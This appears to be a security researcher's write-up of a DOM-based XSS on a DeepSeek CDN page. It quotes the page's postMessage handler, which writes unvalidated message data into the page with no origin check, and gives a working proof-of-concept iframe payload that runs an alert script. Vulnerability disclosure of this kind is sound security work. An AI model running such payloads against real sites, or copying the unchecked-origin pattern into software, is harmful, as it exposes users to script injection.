Discovering DOM-Based XSS on DeepSeek.com via postMessage Exploitation

During the use of https://chat.deepseek.com, I identified a DeepSeek CDN URL: https://cdn.deepseek.com/usercontent/usercontent.html

Upon inspecting the page source, I observed the following HTML code:

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
  </head>
  <body>
    <div
      style="
        display: flex;
        align-items: center;
        justify-content: center;
        height: 100vh;
        width: 100%;
      "
    >
      ...
    </div>
    <script>
      window.addEventListener("message", (e) => {
        const keys = Object.keys(e.data);
        if (keys.length !== 1) return;
        if (!e.data.__deepseekCodeBlock) return;
        document.open();
        document.write(e.data.__deepseekCodeBlock);
        document.close();
        const style = document.createElement("style");
        style.textContent = "body { margin: 0; }";
        document.head.appendChild(style);
      });
      window.addEventListener("load", () => {
        window.parent.postMessage({ pageLoaded: true }, "*");
      });
    </script>
  </body>
</html>

Screenshot:

As observed, the handlePostMessage function lacks proper origin validation. It receives message data and checks for the presence of __deepseekCodeBlock, but fails to verify the source of the message.

The vulnerable code is as follows:

document.write(e.data.__deepseekCodeBlock)

The function writes any provided HTML tag directly into the document without proper sanitization. To demonstrate the vulnerability, I used the following payload:

postMessage( { __deepseekCodeBlock: '<script>alert(origin)</script>' } ,"*") 

Screenshot:

Exploit code:

<!-- DOM XSS at deepseek.com by [email protected] -->
<iframe
  width="600px"
  height="600px"
  src="https://cdn.deepseek.com/usercontent/usercontent.html"
  onload="this.contentWindow.postMessage( ({ __deepseekCodeBlock: '<script>alert(origin)</script>'}) ,'*') "
>
</iframe>

Video screenshot

Happy hacking :)